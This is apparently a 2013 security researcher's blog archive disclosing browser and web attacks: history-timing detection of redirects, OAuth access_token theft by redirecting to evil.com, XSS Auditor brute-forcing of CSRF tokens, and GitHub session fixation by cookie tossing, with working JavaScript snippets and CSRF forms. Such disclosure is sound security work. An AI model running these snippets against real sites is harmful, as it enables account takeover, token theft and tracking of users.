Untrusted code on the same origin.

Another announced killer feature of Sandbox is running untrusted code on your origin (remark: USE A SUBDOMAIN, DON'T BE STUPID). People tend to believe it: "Cool, I will set up a javascript playground on my website!". Like this?

<iframe src="SITE/playground?code=alert(1)" sandbox="allow-scripts"> 

Now think again: what stops an attacker from simply using 'SITE/playground?code=alert(1)' as an XSS hole?

The following may sound like a genius idea to prevent it - putting Sandbox into the Content-Security-Policy header and letting the server side set the sandbox directive. So far only Chrome supports such a header (I use this technology in Pagebox - XSS protection through privileges).

You cannot rely on it out of the box, thus you need a more comprehensive solution — you have to make sure the current page is loaded under the sandbox (the request is authentic), not in a new window.

Server side on the owner page: cookie[:nonce]=SecureRandom.hex(16).

HTML code: <iframe src="SITE/playground?code=alert(1)&nonce=123qwe123" sandbox="allow-scripts"> 

Playground server side: if params[:nonce] and cookie[:nonce] == params[:nonce] ..response..

Now you are secure from arbitrary code reflection. Anyway, don't use it. 

Sandbox was intended only to prevent top navigation (related: frame navigation madness) and "phishing" popups. Severity of what it fixed = very low.

Eventually Sandbox simply broke the Web by creating a new clickjacking bypass. Severity of what it introduced = high.

Misleading posts make people think that Sandbox is a secure way to embed arbitrary content, but there are strings attached.

I don't mean Sandbox is all bad; I only state that the current Sandbox is a poorly designed feature.

Wednesday, March 20, 2013

Pwning Your Privacy in All Browsers

I found new vectors and techniques for the detection attack from my previous post. There is a cross-browser way to detect whether a certain URL redirects to another URL and whether the destination URL equals TRY_URL. Interestingly, in webkit you can check a few million TRY_URLs per minute (brute force).

There were similar attacks before: CSS visited-links leaking, cross-domain search timing - but the vector I am going to describe looks more universal and dangerous.

For sure this is not a critical vulnerability - tens of thousands of years to brute force, say, /callback?code=j4JIos94nh (64**10 => 1152921504606846976, checking 25mln/min). Stealing random tokens does not seem feasible.

On the other hand the trick is WontFix. Every website owner can detect:
  1. if you are user of any other website - github, google, or, maybe, DirtyRussianGirls.com... ?
  2. if you have access to some private resources/URLs (do you follow some protected twitter account)
  3. applications you authorized on any OAuth1/2 provider
  4. some private bits URL can contain: your Facebook nickname or Vkontakte ID.



I wrote a simple JS function and a playground - feel free to use them! (Sorry, the playground can be buggy sometimes; timeouts for Firefox should be longer and direct_history=false.)

check_redirect(base, callback, [assigner])

base, String - starting URL. Can redirect to other URL automatically or only with some conditions (user is not logged in).

callback, Function - receives one Boolean argument: true when at least one of the assigned URLs changed history instantly (the URL was guessed properly) and false when the history object wasn't updated (no URL guessed; all assignments were "reloading").

assigner, Function - optional callback, can be used for arbitrary URL attempts and iterations (bruteforce). For example, bruteforcing a user id between 0-99:
function(w){
  for(var i=0;i < 100;i++){
    w.location='http://site.com/user?id='+i+'#';
  }
}

By default the exploit assigns location=base+'#', checking that no redirect happened at all. Checking if a user is logged in on any website is super easy:

check_redirect('http://site.com/private_path',function(result){
  alert(result ? 'yes' : 'no');
});
(/private_path is supposed to redirect the user in case he is not logged in.)

Under the hood.

When you execute cross_origin_window.location=SAME_URL# and SAME_URL is equal to the current location, browsers do not reload that frame. But, at the same time, they update the 'history' object instantly.
This opens a timing attack on the history object:
  1. Prepare 2 slots in history POINT 1 and POINT 2 that belong to your origin.
    cross_origin_window.location="/postback.html#1"
    cross_origin_window.location="/postback.html#2"
  2. Navigate cross origin window to BASE_URL
    cross_origin_window.location=base_url;
  3. Try to assign location=TRY_URL# and instantly navigate 2 history slots back.
    cross_origin_window.location=try_url+'#';
    cross_origin_window.history.go(-2) 
  4. If the frame changed location to POINT 2 - your TRY_URL was equal to REAL_URL and the history object was updated instantly. If it is POINT 1 - TRY_URL was different and made the browser start reloading the page; the history object was not changed immediately. (See the sketch below.)
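A minimal sketch of the default mode (webkit; assume /postback.html contains <script>opener.postMessage(location.hash,'*')</script> and the timeouts are generous):

function check_redirect(base, callback) {
  var w = window.open('/postback.html#1');                           // POINT 1
  setTimeout(function () { w.location = '/postback.html#2'; }, 500); // POINT 2
  setTimeout(function () { w.location = base; }, 1500);
  setTimeout(function () {
    w.location = base + '#'; // instant history entry iff base did NOT redirect
    w.history.go(-2);        // cross-origin history access - Chrome only, see below
  }, 3000);
  window.onmessage = function (e) {
    // POINT 2 => history grew instantly (no redirect); POINT 1 => redirect happened
    callback(e.data === '#2');
  };
}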
Wait, only Chrome supports cross origin access to "history" property - how can you make it work on other browsers?


Thankfully I found a universal bypass - simply assign a new location POINT 3 which will contain <script>history.go(-3)</script> doing the same job.



Bruteforce in webkit:

Vkontakte (a russian social network) http://m.vk.com/photos redirects to http://m.vk.com/photosUSER_ID. We can use the map-reduce technique from my previous Chrome Auditor script extraction attack.
Iterate 1-1kk, 1kk-2kk, 2kk-3kk and see which range returned to POINT 2. Repeat: 2000000-2100000, 2100000-2200000, etc.

It takes a few minutes to brute force a user id between 1 and 1 000 000. Vkontakte has more than 100 million users - around 10 minutes should be enough.

Maybe performance tricks can make the bruteforce loop faster (e.g. web workers). So far the for(){} loop is the only bottleneck here :)

Conclusion

Website owners can track customers' hobbies, facebook friends (predefined) visiting their blogs etc.

I have a strong feeling we don't want such information to be disclosed. It should be fixed, just like the CSS :visited vulnerability was fixed a few years ago.

Please, browsers, change your mind :)

Bonus - 414 and XFO

During the research I found an unrelated but interesting attack vector, based on X-Frame-Options detection (Jeremiah wrote about it) and the 414 error (URI too long).

Server error pages almost never carry the X-Frame-Options header, so this trick can be applied to many popular websites that use X-Frame-Options.

The picture below makes it clear (LONG_PAYLOAD depends on the server configuration, usually 5000-50000 characters):


Friday, March 15, 2013

The Achilles Heel of OAuth or Why Facebook Adds #_=_

This is a short addition to the previous rants on OAuth problems.

We've got Nir Goldshlager working on our side (he simply loves bounties, and facebook does pay 'em). We both discovered some vulnerabilities in Facebook and joined forces to demonstrate how many potential problems are hidden in OAuth.

TL;DR: all oauth exploits are based on tampering with the redirect_uri parameter.
1 2 3 4
Here I demonstrate 2 more threats proving that a flexible redirect_uri is the Achilles Heel of OAuth.



Open redirect is not a severe vulnerability on its own. OWASP says it can lead to "phishing". Yeah, it's almost nothing, but wait:

URI Fragment & 302 Redirects.
What happens if we load http://site1.com/redirect_to_other_site#DATA and site1.com responds with status 302 and Location: evil.com/blabla?

What about #DATA? It's a so-called URI fragment, a.k.a. location.hash, and it's never sent to the server side.

The browser simply appends exactly the same value to a new redirect destination. Yeah, it will load evil.com/blabla#DATA.

I have a feeling that is not a reasonable browser feature. I have an even stronger feeling that it opens yet another critical flaw in OAuth.

Any chain of 302 redirects
on any allowed redirect_uri domain (Client's domain myapp.com, sometimes Provider's domain too — facebook.com)
to any page with attacker's Javascript (not necessarily open redirect)
= stolen access_token = Game Over

Steps:
  1. window.open(fb auth/redirect_uri=site.com/redirector&response_type=token) 
  2. We get header:
    Location: http://site.com/redirector#access_token=123
  3. When the browser loads http://site.com/redirector it gets following header
    Location: http://evil.com/path
  4. And now the browser navigates to
    http://evil.com/path#access_token=123
  5. our Javascript leaks the location.hash

and this is...
Why Facebook Adds #_=_

Every time Facebook Connect redirects you to another URL it adds #_=_. It is supposed to kill the "sticky" URI fragment which the browser carries through a chain of 302 redirects.

Previously we could use something like
FBAUTH?client_id=approved_app&redirect_uri=ourapp.com
in redirect_uri for other clients as a redirector to our app.

Fb auth for Other client -> Fb auth for Our client#access_token=otherClientToken -> 302 redirect to our app with #access_token of Other client.

Stolen Client Credentials Threat
Consumer keys of official Twitter clients
Is it game over? Currently - yes, both for OAuth1 and OAuth2. Let me explain the response_type=code flow again:

  1. redirect to /authorize url with redirect_uri param
  2. it redirects back to redirect_uri?code=123#_=_
  3. now the server side obtains the access_token by sending the client creds + the redirect_uri used (to prevent leaking through the referrer) + the code

So if we have the client creds, we only need to find a document.referrer leak of redirect_uri (it can be any page with <img src="external site..."> or an open redirector).

How would you obtain an access_token if redirect_uri were static?


Oh, wait, there is no such way, because stolen credentials are not a threat if redirect_uri is whitelisted!


The funniest thing with all these rants
Most of our OAuth hacks pwn the Provider and its users (only the most-common vulnerability pwns the Client's authentication). 

This makes me really curious what the hell is wrong with Facebook and why they don't care about their own Graph security and their own users. Why do they allow a flexible redirect_uri, opening an enormous attack surface (their own domain + the client's app domain)?

We simply play the Find-Chain-Of-302-Redirects, Find-XSS-On-Client and Leak-Credentials-Then-Find-Leaking-Redirect_uri games. Don't they understand it is clearly their business to protect themselves from non-ideal clients?


A good migration technique could be based on recording the most used redirect_uri for every Client (most Rails apps use site.com/auth/facebook/callback) and then setting those redirect_uris as the whitelisted ones.

P.S. Although, as bounty hunters, @isciurus, Nir and I are OK with the current situation. There is so much $$$ floating around redirect_uri...

P.S.2: feel free to fix my language and grammar; many people ask me to elaborate on some paragraphs.

Thursday, March 14, 2013

Brute-Forcing Scripts in Google Chrome

A while ago I found the leaking document.referrer vulnerability and even used it to hack Facebook.

It's Chrome's XSS Auditor again (severity = medium, no bounty again). It can be used against websites serving the X-XSS-Protection: 1;mode=block header.

TL;DR: there is a fast way to detect and extract the content of your scripts.

Even after the document.referrer bug was fixed it is still possible to detect whether the Auditor banned our payload, by checking location.href=='about:blank' (I remind you that about:blank inherits the opener's origin).

The XSS Auditor matches every string between "<script>" and the first comma (or the first 100 characters) against the POST body, the GET query string and the location.hash content.

Scripts, on* event handlers and javascript:* links often contain private information.

The following values can be extracted:
<a onclick="switch_off()"
<script>username='homakov',
<script>email='homakov@gmail.com',
<script>pin=87542,
<script>data={csrf_token:'aBc123dE',
<a href="javascript:fn(123)

I simply send tons of possible payloads, and if some page gets banned (a payload was found in the source code) we know which bunch contains the real content of the script.

'map-reduce'-like technique:
  1. open 10 windows (10 for simplicity, we can use 25 windows. if target has no X-Frame-Options it can be way faster with <iframe>s) containing specific bunches of possible payloads:
    <script>pin=1<script>pin=2<script>pin=3<script>pin=4...
    from 1 to 1000000, from 1000000 to 2000000, from 2000000 to 3000000 etc
  2. if, say, the second window was banned, we repeat the procedure and open new windows with:
    from 1 000 000 to 1 100 000, from 1 100 000 to 1 200 000 etc and so on
  3. finally we open 10 windows with 1 354 030, 1 354 031, 1 354 032, 1 354 033 ... and detect the exact value hidden inside the <script> on the target page (see the sketch below).
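A sketch of the detection primitive behind these steps (the windows variant; the target serves X-XSS-Protection: 1;mode=block, the URL is illustrative):

// Probe one bunch: does the target's script start with "<script>pin=N" for some N?
function probeBunch(lo, hi) {
  var payload = '';
  for (var n = lo; n < hi; n++) payload += '<script>pin=' + n;
  var w = window.open('http://target.com/page?x=' + encodeURIComponent(payload));
  setTimeout(function () {
    var banned = false;
    try {
      // mode=block replaces the page with about:blank, which inherits
      // our origin and is therefore readable - that's the whole leak
      banned = (w.location.href === 'about:blank');
    } catch (e) { /* cross-origin: the page loaded normally, no hit */ }
    if (banned) console.log('hit in range', lo, '-', hi);
    w.close();
  }, 10000);
}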
It definitely pwns your privacy, but is it...

Feasible to brute force CSRF token?
1) The XSS Auditor is case-insensitive, which makes brute force simpler: a-z instead of a-zA-Z.
2) csrf tokens happen to be quite short, 6-10 characters.
3) 36 ^ 6 = 2176782336
4) every bunch checks 5 000 000 variants, so we need ~500 bunches
5) 25 windows per 10 seconds - 200 seconds.
6) now we've found the bunch containing the real value — keep map-reducing that bunch to find the exact value - another 50-60 seconds
7) the recovered value is case-insensitive - to exploit it you should try all possible letter cases: around 50 requests, and one of them will be successful.

200s (find 5 000 000 bunch containing real token)
+ 50s (detect real token in specific bunch)
+ 10s (send 50 malicious requests using <form>+iframe with all possible cases)
= 260s

approximately, exploitation time for different token size:
6 characters — 4.5 minutes
7 characters — 120 minutes
8 characters — 72 hours
Saving checked bunches in the cookie (next time you will continue with other bunches) + using location.hash (it is not sent on server side and can be very long) = plausible CSRF token brute force.

PoC — extract "<script>pin=162621"

Moral:
  • use 8+ characters in the CSRF token
  • all kinds of detections are bad. There is no innocent detections. A small weak spot can be used in a dangerous exploit.
    Today I found a way to brute-force 25 000 000 URLs / minute using location.hash detection (WontFix!). And keep making it faster. 
Bonus - how to keep a malicious page open for a long time:

Friday, March 8, 2013

Hacking Github with Webkit

Previously on Github: XSS, CSRF (My github followers are real, I gained followers using CSRF on bitbucket), access bypass, mass assignments (2 Issues Reported forever), JSONP leaking, open redirect.....

TL;DR: Github is vulnerable to cookie tossing. We can fixate the _csrf_token value using a Webkit bug and then execute arbitrary authorized requests.

Github Pages

Plain HTML pages can be served from yourhandle.github.com. These HTML pages may contain Javascript code.
Wait.
Custom JS on your subdomains is a bad idea:
  1. If you have document.domain='site.com' anywhere on the main domain, for example in an xd_receiver, then you can be easily XSSed from a subdomain
  2. Surprise: Javascript code can set cookies for the whole *.site.com zone, including the main website.

Webkit & cookies order

Our browsers send cookies this way:

Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;

Please keep in mind that the Original _gh_sess and the Dropped _gh_sess are two completely different cookies! They only share the same name.
Also, there is no way for the server to figure out which one is Domain=github.com and which is Domain=.github.com.
Rack (a common interface for ruby web applications) uses the first one:

cookies.each { |k,v| hash[k] = Array === v ? v.first : v }

Here's another thing: Webkit (Chrome, Safari and the new guy, Opera) sends cookies ordered not by Domain (Domain=github.com must go first), and not even by httpOnly (those should obviously go first).
It orders them by creation time (I might be wrong here, but this is how it looks).

First of all let's have a look at the HACKED cookie.

PROTIP — save it as decoder.rb and decode sessions faster:


ruby decoder.rb
BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b

{:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", :_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="}
  1. on a subdomain we create _gh_sess=HACKED; Domain=.github.com
  2. window.open('https://github.com'). Browser sends: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;
  3. Server responds: Set-Cookie:_gh_sess=ORIGINAL; httponly ....
  4. This made our HACKED cookie older than the freshly received ORIGINAL cookie. Repeat the request:
  5. window.open('https://github.com'). Browser sends:
    Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL;
  6. Server response: Set-Cookie:_gh_sess=HACKED; httponly ....
  7. Voila, we fixated it in the Domain=github.com httponly cookie. Now both the Domain=.github.com and Domain=github.com cookies have the same HACKED value.
  8. destroy the Dropped cookie, the mission is accomplished:   document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';
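Condensed into JS, the whole tossing dance from the subdomain looks roughly like this (a sketch; the timeouts are illustrative):

// --- runs on yourhandle.github.com ---
document.cookie = '_gh_sess=HACKED; Domain=.github.com; Path=/';

var w = window.open('https://github.com'); // server re-sets ORIGINAL: it is now "younger"
setTimeout(function () {
  w.location = 'https://github.com';       // this time HACKED is sent first and wins
}, 3000);

setTimeout(function () {                   // step 8: drop the tossed cookie
  document.cookie =
    '_gh_sess=; Domain=.github.com; expires=Thu, 01 Jan 1970 00:00:01 GMT';
}, 6000);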
Initially I was able to break login (a 500 error for every attempt). I had some fun on twitter; Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present).

It makes the victim a guest user (logged out), but after logging in the values remain the same.

Steps:

  1. let's choose our target. We discussed the XSS-privileges problem on twitter a few days ago. Any XSS on github can do anything: e.g. open-source or delete a private repo. This is bad; the Pagebox technique or domain splitting would fix it.

    We don't need an XSS now, since we fixated the CSRF token.
    (A CSRF attack is almost as serious as XSS. The main profit of XSS is that it can read responses; CSRF is write-only.)

  2. So we would like to open-source github/github; thus we need a guy who can technically do this. His name is the Githubber.
  3. I send an email to the Githubber.
    "Hey, check out new HTML5 puzzle! http://blabla.github.com/html5_game"
  4. the Githubber opens the game and it executes the following javascript — replaces his _gh_sess with HACKED (session fixation):

  5. The HACKED session is user_id-less (a guest session). It simply contains a session_id and a _csrf_token; no certain user is specified there.
    So the Game asks him explicitly: please Star us on github (or something like this) <link>.
    He may feel confused (a little bit) to be logged out. Anyway, he logs in again.
  6. The user_id in the session now belongs to the Githubber, but the _csrf_token is still ours!
  7. Meanwhile, the Evil game inserts <script src=/done.js> every 1 second.
    It contains done(false) by default — meaning: keep submitting the form into the iframe:

    <form target=irf action="https://github.com/github/github/opensource" method="post">
    <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
    </form>
  8. At the same time every 1 second I execute on my machine:
    git clone git://github.com/github/github.git 
  9. As soon as the repo is open-sourced my clone request will be accepted. Then I change /done.js to "done(true)". This makes the Evil game submit a similar form and make github/github private again:

    <form target=irf action="https://github.com/github/github/privatesource" method="post">
    <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
    </form>
  10. the Githubber replies: "Nice game" and doesn't notice anything (github/github was open-sourced for a few seconds and I cloned it). Oh, and his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=. Forever (only a cookie reset will update it).



The fast fix — github now expires the Domain=.github.com cookie if 2 _gh_sess cookies were sent to https://github.com/*.
It kills HACKED just before it becomes older than ORIGINAL.

A proper fix would be to use githubpages.com or another separate domain. Blogger uses blogger.com as the dashboard and blogspot.com for blogs.

Last time I promised to publish an OAuth security insight

This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy).

P.S.
I reported the fixation issue privately only because I'm a good guy and was in a good mood.
Responsible disclosure is way more profitable with other websites, where I get a bounty and can afford at least a beer.
Perhaps tumblr has a similar issue; I didn't bother to check.

Sunday, March 3, 2013

Contributions, 2012

All the buzz started after the commit that changed my life.
Here are some highlights of my contributions, a kind of digest.

I did some basic stuff — every newcomer starts with it :P
tried to convince people to fix CSRF, showcasing shitloads of CSRF-vulnerable sites
JSONP
clickjacking
content type verification for JSON input

then spent a while on Rails security:
shameful but effective whitelist by default for mass assignment
getting rid of CSRF-vulnerable 'match' from routes.rb
added default_headers (X-Frame-Options etc) to make Rails apps secure from clickjacking by default
escape_html_entities for JSON.dump
sending nil using XML/JSON params parsers
some whining and XSS showcases on ^$ regexps (no success here)
my presentation with common cases in Moscow
and just plain posts on the future of Rails security: 1, 2.

played with OAuth:
hijacking account, another hijacking, some other vulns and final post — OAuth1, OAuth2, OAuth...? 

browser security
disclosure of URL and HASH (quite slow, but a race-condition standard is a vulnerability anyway)
passwords-autofill

theoretical posts on how to make Web perfect

rethinking cookies: Origin Only
Pagebox - XSS sandbox

Last year was not so bad; the next one should be more productive.

I am going to focus on defensive security (pagebox), Ruby security gems (for rack based apps), authorization techniques (OAuth is getting more popular != better) and financial security.

Also there is not much left to do with Rails - it's well secured now! Thus I am choosing a new framework: likely nodejs or Lift.